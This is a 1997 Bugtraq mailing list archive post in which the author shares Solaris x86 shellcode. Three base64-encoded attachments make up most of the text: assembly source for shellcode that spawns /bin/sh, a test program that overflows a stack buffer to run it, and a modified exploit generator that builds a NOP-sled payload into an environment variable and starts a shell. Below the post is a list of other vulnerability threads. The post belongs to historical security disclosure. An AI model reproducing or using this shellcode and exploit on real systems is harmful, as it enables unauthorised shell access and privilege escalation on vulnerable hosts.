Bugtraq mailing list archives
Solaris x86 buffer overflows
From: jfb11 () MICRO-NET COM (jim bresler)
Date: Thu, 12 Jun 1997 08:49:26 -0400
This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime () docserver cac washington edu for more info. ---559023410-851401618-866119766=:15567 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday. This includes the code I assembled(it will core dump when ran diretly, because it is self-modifying), a test program that should spawn a shell, and a modified version of Aleph One's exploit3.c Note that most buffer overflows are self-modifying in one part, this changes itself in two parts. Because a long call is used and registers cannot be used as arguments, the arguments to the lcall should be ignored. To avoid the need to leave a null charector in at run time, the arguments are changed at run-time. Jim <jfb11 () micro-net com> ---559023410-851401618-866119766=:15567 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="solarisx86_shellcode.s" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.GSO.3.95.970612084926.15567B () candy micro-net com> Content-Description: LmZpbGUJInNvbGFyaXN4ODZfc2hlbGxjb2RlLnMiDQoudmVyc2lvbgkiMDEu MDEiDQouZ2xvYmwgbWFpbg0KCS50eXBlCSBtYWluLEBmdW5jdGlvbg0KbWFp bjoNCglwdXNobCAlZWJwDQoJbW92bCAlZXNwLCVlYnANCglzdWJsICQ4LCVl c3ANCglqbXAgLm9mZnNldDINCi5leGVjdmU6DQoJeG9ybCAlZWF4LCVlYXgN Cgltb3ZiICQweDNiLCVhbA0KCWptcCAuZG9fbGNhbGwNCglyZXQNCi5leGl0 Og0KCXhvcmwgJWVheCwlZWF4DQoJaW5jICVlYXgNCglqbXAgLmRvX2xjYWxs DQoJcmV0DQoNCi5sY2FsbF9vZmYxOg0KCXBvcGwgJWVzaQ0KCXhvcmwgJWVi eCwlZWJ4DQoJbW92bCAlZWJ4LDEoJWVzaSkgDQoJbW92YiAkMHgwNyw1KCVl c2kpDQoJbW92YiAlYmgsNiglZXNpKQ0KCWptcCAubGNhbGxfaW5zDQouZG9f bGNhbGw6DQoJY2FsbCAubGNhbGxfb2ZmMQ0KLmxjYWxsX2luczoNCglsY2Fs bCAkMHgwZjBmLCQweGZmZmZmZmZmDQoJcmV0DQoNCi5vZmZzZXQxOg0KCXBv cGwgJWVzaQ0KCXhvcmwgJWVheCwlZWF4CQ0KCW1vdmwgJWVzaSwweDgoJWVz aSkNCgltb3ZiICVhbCwweDcoJWVzaSkNCgltb3ZsICVlYXgsMHhjKCVlc2kp DQoJcHVzaGwgJWVheA0KCWxlYWwgMHg4KCVlc2kpLCVlYXgNCglwdXNobCAl ZWF4DQoJbW92bCAweDgoJWVzaSksJWVheA0KCXB1c2hsICVlYXgNCgljYWxs IC5leGVjdmUNCglhZGRsICQxMiwlZXNwDQoJcHVzaGwgJDB4MQ0KCWNhbGwg LmV4aXQNCglhZGRsICQ0LCVlc3ANCg0KLm9mZnNldDI6DQoJY2FsbCAub2Zm c2V0MQ0KCS5zdHJpbmcJIi9iaW4vc2giDQo= ---559023410-851401618-866119766=:15567 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="test_sc.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.GSO.3.95.970612084926.15567C () candy micro-net com> Content-Description: Y2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhlY1x4 MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJIlx4 MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVlXHgw MVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1XHhl OFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZmXHgw Zlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZceDA3 XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJceDQ2 XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRceDBj XHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4ZThc eGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KY2hhciBsYXJnZV9z dHJpbmdbMjU2XTsNCg0Kdm9pZCBtYWluKHZvaWQpDQp7DQogY2hhciBidWZm ZXJbMTkyXTsNCiBpbnQgaTsNCiBsb25nICpsb25nX3B0ciA9IChsb25nICop IGxhcmdlX3N0cmluZzsNCg0KIGZvciAoaSA9IDA7IGkgPCA2NDsgaSsrKQ0K ICAgKihsb25nX3B0ciArIGkpID0gKGludCkgYnVmZmVyOw0KDQogZm9yIChp ID0gMDsgaSA8IHN0cmxlbihzaGVsbGNvZGUpOyBpKyspDQogICBsYXJnZV9z dHJpbmdbaV0gPSBzaGVsbGNvZGVbaV07DQoNCiBzdHJjcHkoYnVmZmVyLCBs YXJnZV9zdHJpbmcpOyANCn0NCg== ---559023410-851401618-866119766=:15567 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="exploit3.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.GSO.3.95.970612084926.15567D () candy micro-net com> Content-Description: I2luY2x1ZGUgPHN0ZGxpYi5oPg0KDQojZGVmaW5lIERFRkFVTFRfT0ZGU0VU ICAgICAgICAgICAgICAgICAgICAgMA0KI2RlZmluZSBERUZBVUxUX0JVRkZF Ul9TSVpFICAgICAgICAgICAgICA1MTINCiNkZWZpbmUgTk9QCQkJCTB4OTAN Cg0KY2hhciBzaGVsbGNvZGVbXSA9IA0KCSJceDU1XHg4Ylx4ZWNceDgzXHhl Y1x4MDhceGViXHg1MFx4MzNceGMwXHhiMFx4M2JceGViXHgxNlx4YzMiDQoJ Ilx4MzNceGMwXHg0MFx4ZWJceDEwXHhjM1x4NWVceDMzXHhkYlx4ODlceDVl XHgwMVx4YzZceDQ2XHgwNSINCgkiXHgwN1x4ODhceDdlXHgwNlx4ZWJceDA1 XHhlOFx4ZWNceGZmXHhmZlx4ZmZceDlhXHhmZlx4ZmZceGZmIg0KCSJceGZm XHgwZlx4MGZceGMzXHg1ZVx4MzNceGMwXHg4OVx4NzZceDA4XHg4OFx4NDZc eDA3XHg4OVx4NDYiDQoJIlx4MGNceDUwXHg4ZFx4NDZceDA4XHg1MFx4OGJc eDQ2XHgwOFx4NTBceGU4XHhiZFx4ZmZceGZmXHhmZiINCgkiXHg4M1x4YzRc eDBjXHg2YVx4MDFceGU4XHhiYVx4ZmZceGZmXHhmZlx4ODNceGM0XHgwNFx4 ZThceGQ0Ig0KCSJceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KdW5zaWduZWQg bG9uZyBnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAlZXNwLCVl YXgiKTsNCn0NCg0Kdm9pZCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10p IHsNCiAgY2hhciAqYnVmZiwgKnB0cjsNCiAgbG9uZyAqYWRkcl9wdHIsIGFk ZHI7DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQsIGJzaXplPURFRkFV TFRfQlVGRkVSX1NJWkU7DQogIGludCBpOw0KDQogIGlmIChhcmdjID4gMSkg YnNpemUgID0gYXRvaShhcmd2WzFdKTsNCiAgaWYgKGFyZ2MgPiAyKSBvZmZz ZXQgPSBhdG9pKGFyZ3ZbMl0pOw0KDQogIGlmICghKGJ1ZmYgPSBtYWxsb2Mo YnNpemUpKSkgew0KICAgIHByaW50ZigiQ2FuJ3QgYWxsb2NhdGUgbWVtb3J5 LlxuIik7DQogICAgZXhpdCgwKTsNCiAgfQ0KDQogIGFkZHIgPSBnZXRfc3Ao KSAtIG9mZnNldDsNCiAgcHJpbnRmKCJVc2luZyBhZGRyZXNzOiAweCV4XG4i LCBhZGRyKTsNCg0KICBwdHIgPSBidWZmOw0KICBhZGRyX3B0ciA9IChsb25n ICopIHB0cjsNCiAgZm9yIChpID0gMDsgaSA8IGJzaXplOyBpKz00KQ0KICAg ICooYWRkcl9wdHIrKykgPSBhZGRyOw0KDQogIGZvciAoaSA9IDA7IGkgPCBi c2l6ZS8yOyBpKyspDQogICAgYnVmZltpXSA9IE5PUDsNCg0KICBwdHIgPSBi dWZmICsgKChic2l6ZS8yKSAtIChzdHJsZW4oc2hlbGxjb2RlKS8yKSk7DQog IGZvciAoaSA9IDA7IGkgPCBzdHJsZW4oc2hlbGxjb2RlKTsgaSsrKQ0KICAg ICoocHRyKyspID0gc2hlbGxjb2RlW2ldOw0KDQogIGJ1ZmZbYnNpemUgLSAx XSA9ICdcMCc7DQoNCiAgbWVtY3B5KGJ1ZmYsIkVHRz0iLDQpOw0KICBwdXRl bnYoYnVmZik7DQogIHN5c3RlbSgiL3Vzci9sb2NhbC9iaW4vYmFzaCIpOw0K fQ0K ---559023410-851401618-866119766=:15567--
Current thread:
- wu-ftpd 2.4.2-beta-13 default UMASK hole Roy M. Hooper (Jun 11)
- wu-ftpd 2.4.2-beta-13 default UMASK hole Steve VanDevender (Jun 11)
- Re: wu-ftpd 2.4.2-beta-13 default UMASK hole George Staikos (Jun 11)
- Denial of service (qmail-smtpd) Frank DENIS -Jedi/Sector One- (Jun 11)
- qmail-dos-2.c, another denial of service attack Frank DENIS -Jedi/Sector One- (Jun 11)
- DNS abuse Jordi Murgo (Jun 11)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
- Netscape Exploit root (Jun 14)
- Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
- Re: Bug in SGI's /cgi-bin/handler Yaron Yanay (Jun 15)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- sendmail 8.8.6 released Eric Allman (Jun 14)
- Re: Netscape Exploit Roger Espel Llima (Jun 14)